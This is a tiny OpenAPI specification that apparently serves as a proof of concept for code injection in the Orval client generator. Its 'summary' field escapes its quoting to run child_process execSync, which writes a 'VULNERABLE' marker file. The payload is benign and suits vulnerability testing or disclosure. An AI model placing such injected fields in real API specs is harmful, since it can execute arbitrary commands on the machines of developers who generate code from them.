openapi:3.0.4
info:
title:Test API
version:1.0.0
servers:
-url:https://api.example.com/v1
paths:
/test/status:
get:
summary:"Normal status check' + require('child_process').execSync('echo VULNERABLE > /tmp/orval-real-poc.txt').toString() + '"
description:Get status information
operationId:getStatus
responses:
'200':
description:Successful operation
content:
application/json:
schema:
type:string